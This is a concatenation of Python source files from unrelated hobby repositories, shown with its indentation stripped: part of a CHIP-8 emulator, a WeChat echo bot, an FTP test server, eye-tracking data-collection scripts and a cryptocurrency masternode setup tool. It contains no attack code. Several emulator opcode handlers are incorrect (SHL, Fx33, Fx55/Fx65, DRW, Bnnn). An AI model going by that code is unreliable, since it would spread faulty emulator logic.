# 8xy3 - XOR Vx, Vy - Set Vx = Vx XOR Vy.
elif opcode & 0xF == 0x3:
logging.debug(hex(opcode) + " == 8xy3 - XOR Vx, Vy - Set Vx = Vx XOR Vy")
self.V[x] = self.V[x] ^ self.V[y]
self.pc += 2
# 8xy4 - ADD Vx, Vy - Set Vx = Vx + Vy, set VF = carry.
elif opcode & 0xF == 0x4:
logging.debug(hex(opcode) + " == 8xy4 - ADD Vx, Vy - Set Vx = Vx + Vy, set VF = carry")
if self.V[x] + self.V[y] > 0xFF:
self.V[0xF] = 1
self.V[x] = (self.V[x] + self.V[y]) - 256
else:
self.V[0xF] = 0
self.V[x] = self.V[x] + self.V[y]
self.pc += 2
# 8xy5 - SUB Vx, Vy - Set Vx = Vx - Vy, set VF = NOT borrow.
elif opcode & 0xF == 0x5:
logging.debug(hex(opcode) + " == 8xy5 - SUB Vx, Vy - Set Vx = Vx - Vy, set VF = NOT borrow")
if self.V[x] > self.V[y]:
self.V[0xF] = 1
else:
self.V[0xF] = 0
self.V[x] = self.V[x] - self.V[y]
self.pc += 2
# 8xy6 - SHR Vx {, Vy} - Set Vx = Vx SHR 1.
elif opcode & 0xF == 0x6:
logging.debug(hex(opcode) + " == 8xy6 - SHR Vx {, Vy} - Set Vx = Vx SHR 1")
if self.V[x] & 0x1 == 1:
self.V[0xF] = 1
else:
self.V[0xF] = 0
self.V[x] = self.V[x] / 2
self.pc += 2
# 8xy7 - SUBN Vx, Vy - Set Vx = Vy - Vx, set VF = NOT borrow.
elif opcode & 0xF == 0x7:
logging.debug(hex(opcode) + " == 8xy7 - SUBN Vx, Vy - Set Vx = Vy - Vx, set VF = NOT borrow")
if self.V[y] > self.V[x]:
self.V[0xF] = 1
else:
self.V[0xF] = 0
self.V[x] = self.V[y] - self.V[x]
self.pc += 2
# 8xyE - SHL Vx {, Vy} - Set Vx = Vx SHL 1.
elif opcode & 0xF == 0xE:
logging.debug(hex(opcode) + " == 8xyE - SHL Vx {, Vy} - Set Vx = Vx SHL 1")
if self.V[x] & 0x80 >> 7 == 1:
self.V[0xF] = 1
else:
self.V[0xF] = 0
self.V[x] = self.V[x] * 2
self.pc += 2
else:
raise LookupError(hex(opcode) + ": This operation is not available, are you using a Super Chip-8 ROM?")
# 9xy0 - SNE Vx, Vy - Skip next instruction if Vx != Vy.
elif (opcode_identifier == 0x9000) and (opcode & 0xF == 0x0):
logging.debug(hex(opcode) + " == 9xy0 - SNE Vx, Vy - Skip next instruction if Vx != Vy")
if self.V[x] != self.V[y]:
self.pc += 4
else:
self.pc += 2
# Annn - LD I, addr - Set I = nnn.
elif opcode_identifier == 0xA000:
logging.debug(hex(opcode) + " == Annn - LD I, addr - Set I = nnn")
self.I = nnn
self.pc += 2
# Bnnn - JP V0, addr - Jump to location nnn + V0.
elif opcode_identifier == 0xB000:
logging.debug(hex(opcode) + " == Bnnn - JP V0, addr - Jump to location nnn + V0")
self.pc = nnn + self.V[0]
self.pc += 2
# Cxkk - RND Vx, byte - Set Vx = random byte AND kk.
elif opcode_identifier == 0xC000:
logging.debug(hex(opcode) + " == Cxkk - RND Vx, byte - Set Vx = random byte AND kk")
random_byte = random.randint(0, 255)
self.V[x] = random_byte & kk
self.pc += 2
# Dxyn - DRW Vx, Vy, nibble
# Display n-byte sprite starting at memory location I at (Vx, Vy), set VF = collision.
elif opcode_identifier == 0xD000:
logging.debug(hex(opcode) + " == Dxyn - DRW Vx, Vy, nibble - Display sprite and set collision")
height = opcode & 0x000F
width = 8
x_initial = self.V[y]
y_initial = self.V[x]
for x_pos in range(height):
binary_string = bin(self.memory[self.I+x_pos])
binary_string = binary_string[2:].zfill(width)
for y_pos in range(width):
self.graphics[(x_initial+x_pos) % 31][(y_initial+y_pos) % 63] = binary_string[y_pos]
self.pc += 2
#EXXX - Multiple opcodes
elif opcode_identifier == 0xE000:
# Ex9E - SKP Vx - Skip next instruction if key with the value of Vx is pressed.
if (opcode & 0xF0FF) == 0xE091:
logging.debug(hex(opcode) + " == Ex9E - SKP Vx - Skip next instruction if key with the value of Vx is pressed")
if key == self.V[x]:
self.pc += 4
else:
self.pc += 2
# ExA1 - SKNP Vx - Skip next instruction if key with the value of Vx is not pressed.
elif opcode & 0xF0FF == 0xE0A1:
logging.debug(hex(opcode) + " == ExA1 - SKNP Vx - Skip next instruction if key with the value of Vx is not pressed")
if key != self.V[x]:
self.pc += 4
else:
self.pc += 2
else:
raise LookupError(hex(opcode) + ": This operation is not available, are you using a Super Chip-8 ROM?")
# FXXX - Multiple opcodes
elif opcode_identifier == 0xF000:
# Fx07 - LD Vx, DT - Set Vx = delay timer value.
if opcode & 0xF0FF == 0xF007:
logging.debug(hex(opcode) + " == Fx07 - LD Vx, DT - Set Vx = delay timer value")
self.V[x] = self.delay
self.pc += 2
# Fx0A - LD Vx, K - Wait for a key press, store the value of the key in Vx.
# Program counter does not progress if no keys are pressed, so no loop necessary
elif opcode & 0xF0FF == 0xF00A:
logging.debug(hex(opcode) + " == Fx0A - LD Vx, K - Wait for a key press, store the value of the key in Vx")
if key:
self.V[x] = key
self.pc += 2
# Fx15 - LD DT, Vx - Set delay timer = Vx.
elif opcode & 0xF0FF == 0xF015:
logging.debug(hex(opcode) + " == Fx15 - LD DT, Vx - Set delay timer = Vx")
self.delay = self.V[x]
self.pc += 2
# Fx18 - LD ST, Vx - Set sound timer = Vx.
elif opcode & 0xF0FF == 0xF018:
logging.debug(hex(opcode) + " == Fx18 - LD ST, Vx - Set sound timer = Vx")
self.sound = self.V[x]
self.pc += 2
# Fx1E - ADD I, Vx - Set I = I + Vx. #
elif opcode & 0xF0FF == 0xF01E:
logging.debug(hex(opcode) + " == Fx1E - ADD I, Vx - Set I = I + Vx")
self.I = self.I + self.V[x]
self.pc += 2
# Fx29 - LD F, Vx - Set I = location of sprite for digit Vx.
elif opcode & 0xF0FF == 0xF029:
logging.debug(hex(opcode) + " == Fx29 - LD F, Vx - Set I = location of sprite for digit Vx")
self.I = (self.V[x] * 5) + self.sprite_pointer
self.pc += 2
# Fx33 - LD B, Vx - Store BCD representation of Vx in memory locations I, I+1, and I+2.
elif opcode & 0xF0FF == 0xF033:
logging.debug(hex(opcode) + " == Fx33 - LD B, Vx - Store BCD representation of Vx in memory locations I, I+1, and I+2")
self.memory[self.I] = (self.V[x >> 8] / 100);
self.memory[self.I + 1] = ((self.V[x >> 8] / 10) % 10);
self.memory[self.I + 2] = ((self.V[x >> 8] % 100) % 10);
self.pc += 2
# Fx55 - LD [I], Vx - Store registers V0 through Vx in memory starting at location I.
elif opcode & 0xF0FF == 0xF055:
logging.debug(hex(opcode) + " == Fx55 - LD [I], Vx - Store registers V0 through Vx in memory starting at location I")
for i in range(0x10):
self.memory[self.I + i] = self.V[i]
self.pc += 2
# Fx65 - LD Vx, [I] - Read registers V0 through Vx from memory starting at location I.
elif opcode & 0xF0FF == 0xF065:
logging.debug(hex(opcode) + " == Fx65 - LD Vx, [I] - Read registers V0 through Vx from memory starting at location I")
for i in range(0x10):
self.V[i] = self.memory[self.I + i]
self.pc += 2
else:
raise LookupError(hex(opcode) + ": This operation is not available, are you using a Super Chip-8 ROM?")
else:
raise LookupError(hex(opcode) + ": This operation is not available, are you using a Super Chip-8 ROM?")
|
Maxic/Chip-8 | chip8.py | <filename>chip8.py
from cpu import Cpu
import os
import pygame
"""
+-----------------------+
| CHIP-8 Emulator |
| |
| <NAME> 2018 |
+-----------------------+
"""
def main():
# Initialize CPU
cpu = Cpu()
# Initialize graphics
key_lookup = initialize_io()
key = None
# Specify Rom (TODO: Build CLI)
rom_path = "~Barend/Github/Chip-8/Roms/EMULOGO.ch8"
# Load ROM
load_rom(cpu.memory, cpu.pc, rom_path)
# Main cycle
while cpu.pc <= 4096:
# Get pressed keys
for event in pygame.event.get():
if event.type == pygame.KEYDOWN:
key = key_lookup[event.unicode]
# fetch opcode from memory
opcode = cpu.fetch_opcode(cpu.pc)
hex_opcode = hex(opcode)
program_counter = cpu.pc
# Execute opcode
cpu.execute_operation(opcode, key)
def load_rom(memory, pc, rom_path):
print("Loading ROM from" + rom_path)
with open(os.path.expanduser(rom_path), "rb") as f:
rom_data = f.read()
i = 0
while i < len(rom_data):
memory[pc + i] = rom_data[i]
i += 1
def initialize_io():
pygame.init()
pygame.display.set_mode()
key_lookup = {
'q': 0,
'w': 1,
'e': 2,
'a': 3,
's': 4,
'd': 5,
'z': 6,
'x': 7,
'c': 8,
'1': 9,
'2': 10,
'3': 11,
'4': 12,
'5': 13,
'6': 14,
'7': 15,
}
return key_lookup
if __name__ == "__main__":
main()
|
ikeleeeeee/ItChat | myWeChatBot.py | import itchat
@itchat.msg_register(itchat.content.TEXT)
def print_content(msg):
return(msg['Text'])
itchat.auto_login()
itchat.run() |
deniskovalchuk/ftp-client | test/ftp/server/server.py | <filename>test/ftp/server/server.py
#
# MIT License
#
# Copyright (c) 2020 <NAME>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import sys
from pyftpdlib.authorizers import DummyAuthorizer
from pyftpdlib.handlers import FTPHandler
from pyftpdlib.servers import FTPServer
def main():
if len(sys.argv) != 3:
print("Usage: server.py port home_directory")
return
port = sys.argv[1]
home_directory = sys.argv[2]
# Add user with the following permissions:
# e - change directory (CWD, CDUP commands)
# l - list files (LIST, NLST, STAT, MLSD, MLST, SIZE commands)
# r - retrieve file from the server (RETR command)
# a - append data to an existing file (APPE command)
# d - delete file or directory (DELE, RMD commands)
# f - rename file or directory (RNFR, RNTO commands)
# m - create directory (MKD command)
# w - store a file to the server (STOR, STOU commands)
authorizer = DummyAuthorizer()
authorizer.add_user("user", "password", home_directory, perm = "elradfmw")
handler = FTPHandler
handler.authorizer = authorizer
handler.banner = "FTP server is ready."
address = ("localhost", port)
server = FTPServer(address, handler)
server.serve_forever()
if __name__ == "__main__":
main() |
JortGroen/eyeMouse | src/data_creation_game4.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Mon Sep 7 11:00:24 2020
@author: djoghurt
"""
import cv2
import numpy as np
import dlib
from math import hypot
import pyautogui
import random
import subprocess
import json
import threading
import time
import os
receiveBuffer = ""
receiveStatus = 0
DATA = ""
stopReader = False
class screenShape:
width = 0
height = 0
def create_dot(screen, screenSize):
screen.fill(255)
x = random.randint(1, screenSize.width)
y = random.randint(1, screenSize.height)
cv2.circle(screen, (x,y), 10, (0,0,255), -1)
return (x,y)
def dotGreen(screen, targetLoc):
#print("dotGreen")
screen.fill(255)
cv2.circle(screen, targetLoc, 10, (0,255,0), -1)
def save_data():
pass
def game_init(screenSize, fullScreen=True):
screen = np.zeros([screenSize.height,screenSize.width,3],dtype=np.uint8)
screen.fill(255)
targetLoc = (int(screenSize.width/2),int(screenSize.height/2))
cv2.circle(screen, targetLoc, 10, (0,0,255), -1)
if fullScreen==True:
cv2.namedWindow("window", cv2.WND_PROP_FULLSCREEN)
cv2.setWindowProperty("window",cv2.WND_PROP_FULLSCREEN,cv2.WINDOW_FULLSCREEN)
return screen, screenSize, targetLoc
def dataReceiver(process):
global receiveBuffer, receiveStatus, DATA, stopReader
newData = False
while(stopReader==False and process.poll()==None):
outputRaw = process.stdout.readline()
output = str(outputRaw.strip())[2:-1]
index = output.find("<data>")
if index > -1:
#print("start!")
receiveBuffer = ""
output = output[index+6:]
if receiveStatus==1:
print("WARNING: I received a data start key without finishing my previous data read, data might be corrupted!")
receiveStatus = 1
index = output.find("</data>")
if index > -1:
#print("stop!")
receiveBuffer = receiveBuffer+output[:index]
#print(receiveBuffer)
receiveStatus = 0
DATA = receiveBuffer
newData = True
if receiveStatus==1:
receiveBuffer = receiveBuffer+output
process.kill()
def startupRecognition():
global DATA, stopReader
#process = subprocess.Popen(['echo', '"Hello stdout"'], stdout=subprocess.PIPE)
#process = subprocess.Popen(["python", "testPrinter.py"], stdout=subprocess.PIPE)
process = subprocess.Popen(["python", "featureGrabber.py"], stdout=subprocess.PIPE)
threadReader = threading.Thread(target=dataReceiver, args=(process,))
threadReader.start()
print("waiting for the recognition model to start up, this can take a minute")
print("please make sure privacy cover is away from the camera")
t=0
timer=0
while process.poll() is None and len(DATA)==0: # wait untill first data is received
t=t+1
if t>100000:
print(".", end='')
t=0
timer=timer+1
assert len(DATA)>0,"ERROR: something went wrong, couldn't have communication with the recognition model"
print("took us",timer)
print("\nlets goooo!!!")
return process
def storeDatapoint(targetLoc):
global DATA
print("targetLoc:",targetLoc,"DATA:",DATA)
data = DATA
DATA=""
data = json.loads(data)
def main():
global stopReader
started=False
process = startupRecognition()
screenSize = pyautogui.size()
screenSize = screenShape()
screenSize.width = 100
screenSize.height = 100
screen, screenSize, targetLoc = game_init(screenSize, fullScreen=False)
while True:
cv2.imshow('window', screen)
if len(DATA)>0:
dotGreen(screen, targetLoc)
key = cv2.waitKey(1)
if key == 32:
if len(DATA)>0:
if started:
storeDatapoint(targetLoc)
else:
started=True
targetLoc = create_dot(screen, screenSize)
else:
print("no new data")
#cv2.putText(screen, 'face', (10,30), cv2.FONT_HERSHEY_SIMPLEX, 1, (0,0,255),2, cv2.LINE_AA)
if key == 27:
stopReader=True
print("quitting")
break
if process.poll() is not None:
print("the model stopped, will quit now too")
stopReader=True
break
cv2.destroyAllWindows()
main()
|
JortGroen/eyeMouse | src/testPrinter.py | <reponame>JortGroen/eyeMouse
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Wed Sep 8 19:46:44 2021
@author: djoghurt
"""
import time
import json
data = {}
data["name"]="testPrinter"
for i in range(10):
data["value"] = i
json_data = json.dumps(data, indent = 4)
print("jkljl<data>", flush=True)
print(json_data, flush=True)
print("</data>lkj", flush=True)
print("", flush=True)
print("test"+str(i), flush=True)
time.sleep(3) |
JortGroen/eyeMouse | landmarks_test.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Mon Sep 21 16:54:57 2020
@author: djoghurt
"""
import cv2
import numpy as np
import dlib
cap = cv2.VideoCapture(0)
detector = dlib.get_frontal_face_detector()
predictor = dlib.shape_predictor("src/3rdparty/shape_predictor_68_face_landmarks.dat")
mapping = [45, 42, 36, 39, 33]
while True:
_, frame = cap.read()
frame = cv2.flip(frame, 1)
gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
faces = detector(gray)
if len(faces)>0:
face = faces[0]
landmarks = predictor(gray, face)
for i in range(landmarks.num_parts):
p = landmarks.part(i)
cv2.circle(frame, (p.x, p.y), 3, (0,0,255), -1)
cv2.putText(frame, str(i), (p.x, p.y), cv2.FONT_HERSHEY_SIMPLEX, 0.4, (0,255,0), 1, cv2.LINE_AA)
cv2.imshow("Output", frame)
key = cv2.waitKey(1)
if key == 27:
break
cap.release()
cv2.destroyAllWindows() |
JortGroen/eyeMouse | src/test.py | <filename>src/test.py<gh_stars>0
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sat Jan 23 15:33:26 2021
@author: djoghurt
"""
import pygame
import sys
import random
import pyautogui
screenSize = pyautogui.size()
def game_init():
#screen = pygame.display.set_mode(screenSize)
screen = pygame.display.set_mode([0,0], pygame.FULLSCREEN)
screen.fill((255,255,255))
pygame.draw.circle(screen, (255,0,0), (50,50), 20)
pygame.display.flip()
return screen
def create_dot(screen):
x = random.randint(1, screenSize.width)
y = random.randint(1, screenSize.height)
pygame.draw.circle(screen, (255,0,0), (x,y), 20)
return screen
def game_update(screen):
for event in pygame.event.get():
if event.type == pygame.QUIT:
return False
elif event.type == pygame.KEYDOWN:
if event.key == pygame.K_SPACE:
print("space")
screen.fill((255,255,255))
screen = create_dot(screen)
pygame.display.flip()
elif event.key == pygame.K_q:
print("quit")
return False
return True
def main():
screen = game_init()
while True:
if not game_update(screen):
return
pygame.init()
main()
pygame.quit()
|
JortGroen/eyeMouse | thread_test.py | <gh_stars>0
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue Sep 29 17:09:56 2020
@author: djoghurt
"""
import threading
import time
import cv2 as cv
import numpy as np
def pizza():
for i in range(10):
x = 0
for j in range(10000000):
x = x+j
print("pizza")
return
def patat():
for i in range(10):
x = 0
for j in range(10000000):
x = x+j
print("patat")
return
def show_colour(name):
print("starting", name)
#name = "1"
colour = (255,0,0)
screenSize = (20, 10)
screen = np.zeros([screenSize[1],screenSize[0],3],dtype=np.uint8)
screen.fill(255)
i=0
while(True):
cv.imshow(name, screen)
# if cv.waitKey(1) & 0xFF == ord('q'):
# cv.destroyAllWindows()
# break
return
# pizza()
# patat()
# thread1 = threading.Thread(target=pizza, name="pizza")
# thread2 = threading.Thread(target=patat, name="patat")
# thread1.start()
# thread2.start()
# thread1 = threading.Thread(target=show_colour("1"), name="1")
thread1 = threading.Thread(target=pizza, name="1")
thread1.daemon = True
#thread2 = threading.Thread(target=show_colour("2"), name="2")
thread2 = threading.Thread(target=patat, name="2")
thread2.daemon = True
thread3 = threading.Thread(target=show_colour, args=("3",), name="3")
thread3.deamon = True
thread1.start()
thread3.start()
thread2.start()
#thread3.start()
i = 0
while(True):
# print(i)
# i = i+1
if not thread1.isAlive():
break
|
mtmonte/MasternodeSetup | MasternodeSetup/masternode.py | #!/usr/bin/env python3
# MIT License
#
# Copyright (c) 2018 Cosmos Coin Developers, https://cosmoscoin.co/
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import os
from . import vps
from . import core
import argparse
import configparser
CONFIG_FILENAME = os.path.join(os.path.dirname(__file__), "conf", "config.ini")
DESCRIPTION = "End to end script to setup a masternode"
ROOT_USER = "root"
def getConfig():
"""Parse configuration file.
Returns:
dict: Dictionary containing the options parsed.
"""
config = configparser.ConfigParser()
config.read(CONFIG_FILENAME)
return config
def begin(args):
"""Wrapper function that starts the application with the given arguments.
Args:
args (obj): Object containing the command line arguments parsed.
"""
try:
# Parse file configuration
config = getConfig()
# Ensure all local requirements met (e.g. wallet installed)
core.checkPrerequisites(config)
# Setup VPS - Update packages, install binaries
vps.setup(args.vps, ROOT_USER, args.password, config)
# Setup masternode locally
core.setup(args.vps, ROOT_USER, args.password, args.name, config)
except Exception as e:
print("Masternode setup failed. Reason: {0}.".format(str(e)))
raise e
def setup():
"""Program entrypoint. This function will parse all program arguments and start the application.
"""
parser = argparse.ArgumentParser(description=DESCRIPTION)
parser.add_argument("--name", action="store", required=True, help="The name to be given to the masternode")
parser.add_argument("--vps", action="store", required=True, help="The IP address of the VPS server to be used")
parser.add_argument("--password", action="store", required=True, help="The root password for the VPS provided")
args = parser.parse_args()
begin(args)
if __name__ == "__main__":
setup() |
mtmonte/MasternodeSetup | setup.py | <gh_stars>1-10
#!/usr/bin/env python3
# MIT License
#
# Copyright (c) 2018 Cosmos Coin Developers, https://cosmoscoin.co/
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from setuptools import setup
setup(name="Cosmos Coin Masternode Setup",
version="1.1.0",
description="End to end script to setup a masternode",
url="https://github.com/mtmonte/MasternodeSetup",
author="mtmonte",
author_email="<EMAIL>",
keywords="bitcoin cosmos coin crypto cryptocurrency masternode",
license="MIT",
packages=["MasternodeSetup"],
python_requires=">=3.3.0",
install_requires=["paramiko"],
entry_points={"console_scripts": ["cosmos-masternode-setup=MasternodeSetup.command_line:main"]},
include_package_data=True,
zip_safe=False) |
mtmonte/MasternodeSetup | MasternodeSetup/core.py | <filename>MasternodeSetup/core.py
#!/usr/bin/env python3
# MIT License
#
# Copyright (c) 2018 Cosmos Coin Developers, https://cosmoscoin.co/
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import os
import glob
import time
import json
import pprint
import string
import random
import getpass
import subprocess
from . import vps
from . import daemon
from os import environ
RPC_USER_LENGTH = 32
RPC_PASSWORD_LENGTH = 32
CONF_TEMPLATE_FILE = os.path.join(os.path.dirname(__file__), "conf", "conf.template")
ACTIVATION_STRING = "waiting for remote activation"
def checkIfEnvironmentDefined(envHome, envUser):
"""Checks if the required environment variables are defined.
Args:
envHome (str): The name of the home environment variable.
envUser (str): The name of the user environment variable.
"""
if envHome not in environ:
raise ValueError("Please set {0} environment variable".format(envHome))
elif envUser not in environ:
raise ValueError("Please set {0} environment variable".format(envUser))
def checkIfWalletInstalled(cli, daemonCli):
"""Check if the local wallet is installed.
Args:
cli (str): The full path of the local cli binary.
daemonCli (str): The full path of the local daemon binary.
"""
if not glob.glob("{0}*".format(cli)):
raise ValueError("Unable to find file: {0}, please check your installation".format(cli))
elif not glob.glob("{0}*".format(daemonCli)):
raise ValueError("Unable to find file: {0}, please check your installation".format(daemonCli))
def setupWallet(walletConfFile):
"""This function will setup the local wallet requirements.
Args:
walletConfFile (str): Full path to wallet conf file.
"""
print("Setup wallet configuration..")
if "rpcuser" not in open(walletConfFile).read():
print("Creating rpcuser setting..")
with open(walletConfFile, "a") as f:
f.write("rpcuser={0}\n".format(generateRandomString(RPC_USER_LENGTH)))
if "rpcpassword" not in open(walletConfFile).read():
print("Creating rpcpassword setting..")
with open(walletConfFile, "a") as f:
f.write("rpcpassword={0}\n".format(generateRandomString(RPC_PASSWORD_LENGTH)))
print("")
def startLocalDaemon(daemonCli):
"""Start the local daemon. Required to use the coin cli.
Args:
daemonCli (str): The full path of the local daemon binary.
Returns:
Obj: The process associated with the daemon that was started.
"""
print("Starting local daemon..")
try:
proc = daemon.start(daemonCli)
# Ensure that the daemon did not fail and is still running
proc.communicate(timeout=20)
except subprocess.TimeoutExpired:
pass
else:
raise ValueError("Failed to start local daemon")
print("")
return proc
def stopLocalDaemon(cli):
"""Stop the local daemon.
Args:
cli (str): The full path of the local cli binary.
"""
print("Stopping local daemon..")
try:
daemon.stop(cli)
except:
raise ValueError("Failed to stop local daemon")
print("")
def pollForWalletSync(cli):
"""Poll for the wallet to be fully synced (on daemon).
Utilizes the blockchain info RPC call to check that verification in progress
is at least 1.00. This field is an estimate of the synchronization status.
Checking this number ensures we are in sync with a good confidence level.
Args:
cli (str): The full path of the local cli binary.
"""
print("Wait for wallet to by synchronized..")
blockchaininfo = daemon.getBlockchainInfo(cli)
blockchainvalues = json.loads(blockchaininfo)
# Loop continuously until we know we are synced
while blockchainvalues["verificationprogress"] < 1:
blockchaininfo = daemon.getBlockchainInfo(cli)
blockchainvalues = json.loads(blockchaininfo)
print("Progress.. {0}%".format(blockchainvalues["verificationprogress"] * 100))
time.sleep(5)
print("")
def getTotalUnlockedBalance(cli):
"""Get the total balance in wallet without accounting for locked coins (i.e. from masternodes)
Args:
cli (str): The full path of the local cli binary.
Returns:
Int: The total unlocked balance present.
"""
output = daemon.listUnspent(cli)
values = json.loads(output)
return sum(input['amount'] for input in values)
def unlockWallet(cli):
"""Unlocks the wallet temporarily so that other operations may be performed.
Args:
cli (str): The full path of the local cli binary.
"""
done = False
# Loop until the correct password is seen
while done == False:
try:
passphrase = getpass.getpass(prompt="Please enter you wallet passphrase: ")
output = daemon.unlockWallet(cli, passphrase)
except:
pass
print("Incorrect passphrase, please try again..")
else:
done = True
print("")
def sendCollateralToAddress(cli, address, collateral):
"""Send the collateral amount to the specified address.
Args:
cli (str): The full path of the local cli binary.
address (str): The address to be used for the masternode.
collateral (int): The collateral amount to be sent.
Returns:
String: The txid associated with this transaction.
"""
try:
# If the wallet is not encrypted, no unlocking is necessary
txid = daemon.sendToAddress(cli, address, collateral)
except:
print("Wallet is locked, please unlock your wallet..")
unlockWallet(cli)
txid = daemon.sendToAddress(cli, address, collateral)
return txid
def getMasternodeOutput(cli, txid):
"""Get the masternode output containing the masternode txid.
Args:
cli (str): The full path of the local cli binary.
txid (str): The txid associated with the collateral.
Returns:
Dict: A dictionary containing the masternode output
"""
output = daemon.getMasternodeOutputs(cli)
values = json.loads(output)
txValues = [value for value in values if value['txhash'] == txid]
# There should be a single match, check to be sure
if len(txValues) != 1:
raise ValueError("Transaction: {0} was not found in masternode outputs".format(txid))
return txValues[0]
def setupMasternodeTransaction(cli, label, collateral):
"""Performs a setup of the transactions required to create a masternode.
Specifically:
1. Check balance
2. Generate address
3. Send collateral to address
4. Get masternode output
5. Get masternode key
Args:
cli (str): The full path of the local cli binary.
label (str): The label to be used when generating a new address.
collateral (int): The collateral amount to be sent.
Returns:
2-Tuple: Tuple containing the masternode output and masternode key
"""
print("Setup masternode transaction..\n")
# First check we have enough balance
balance = getTotalUnlockedBalance(cli)
print("Collateral required: {0}, total unlocked balance: {1}".format(collateral, balance))
if balance < collateral:
raise ValueError("Insufficient funds")
# Generate new address for masternode
address = daemon.generateNewAddress(cli, label)
print("Send collateral to new address: {{{0}: {1}}}".format(label, address))
# Send collateral to new address
txid = sendCollateralToAddress(cli, address, collateral)
print("Sent collateral successfully, txid: {0}\n".format(txid))
# Get masternode output associated with collateral
print("Get masternode output..")
masternodeOutput = getMasternodeOutput(cli, txid)
print("Masternode output:\n{0}\n".format(masternodeOutput))
# Get masternode key to be used
print("Get masternode key..")
masternodeKey = daemon.generateMasternodeKey(cli)
print("Masternode key: {0}\n".format(masternodeKey))
return (masternodeOutput, masternodeKey)
def generateRandomString(length):
"""Generate a random string of a specified length. To be used in rpc information.
Args:
length (int): Length of string to be generated.
Returns:
String: String that was generated.
"""
choice = string.ascii_uppercase + string.ascii_lowercase + string.digits
return ''.join(random.SystemRandom().choice(choice) for _ in range(length))
def setupVpsConfFile(server, user, password, confFile, masternodeKey):
"""Setup the vps masternode configuration file.
Args:
server (str): The IP address of the server to connect to.
user (str): The username to be used in the connection.
password (str): The password associated with the user.
confFile (str): The full path to the configuration file to be used.
masternodeKey (str): The masternode key associated with this node.
"""
print("Setup VPS conf file..")
values = dict()
# Generate random values for user and password
values["rpcuser"] = generateRandomString(RPC_USER_LENGTH)
values["rpcpassword"] = generateRandomString(RPC_PASSWORD_LENGTH)
values["externalip"] = server
values["masternodepivkey"] = masternodeKey
# Parse and replace template file with values
source = ""
with open(CONF_TEMPLATE_FILE) as template:
source = string.Template(template.read())
sourceFile = source.substitute(values)
print("Generated configuration file:")
pprint.pprint(sourceFile)
print("")
# Send configuration file to vps
